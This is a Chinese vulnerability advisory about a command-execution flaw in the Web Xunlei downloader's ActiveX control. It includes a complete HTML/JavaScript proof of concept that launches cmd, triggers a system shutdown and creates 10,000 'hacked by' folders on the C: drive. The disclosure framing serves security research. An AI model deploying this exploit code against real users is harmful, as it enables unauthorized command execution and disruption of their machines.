web迅雷允许执行任意系统命令漏洞

发布于 2022-10-15 08:32:53 字数 2540 浏览 23 评论 0

web迅雷允许执行任意系统命令漏洞

发布日期:2010-10-24
更新日期:2011-04-26

受影响系统:
XunLei web迅雷
描述:
--------------------------------------------------------------------------------
Web迅雷是一款基于多资源超线程技术的下载工具,它继承了迅雷5的操作方便、高速下载的特点外,同时使用全网页化的操作界面,更符合互联网用户使用习惯,是国内第一款网页上的下载工具。

Web迅雷在实现上存在设计漏洞,程序会接收攻击者提供的恶意参数直接执行,远程攻击者可利用此漏洞控制用户受影响系统。

<*来源:kxlzx
  
  链接:http://www.inbreak.net/archives/165
*>

测试方法:
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

  1. <html>
  2. <head>
  3. <title>迅雷执行任意系统命令</title>
  4. </head>
  5. <body>
  6. 运行迅雷加载项。
  7. <script>
  8. /**
  9. *by kxlzx
  10. */
  11. server = new ActiveXObject("ThunderServer.WebThunder.1");
  12. if(server==null)
  13. {
  14.     alert("没装迅雷,请安装web迅雷");
  15.     window.location.href="http://dl.xunlei.com/wxl.html";
  16. }else{
  17.     server.OpenDirectory("cmd");
  18.     alert("要我帮你关机么?");
  19.     alert("哎呀呀!悲剧啊!你怎么不小心点了确定了?");
  20.     server.OpenDirectory("tsshutdn");
  21.     //创建无数文件夹
  22.     j = 10000;
  23.     for(i=0;i<j;i++){
  24.         server.CreatePathTree("c:\\hacked by kxlzx "+i);
  25.     }
  26.     setTimeout("alert('还愣着?赶快保存啊!')",50000);
  27. }
  28. </script>
  29. </body>
  30. </html>

复制代码建议:
--------------------------------------------------------------------------------
厂商补丁:

XunLei
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://dl.xunlei.com/wxl.html

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文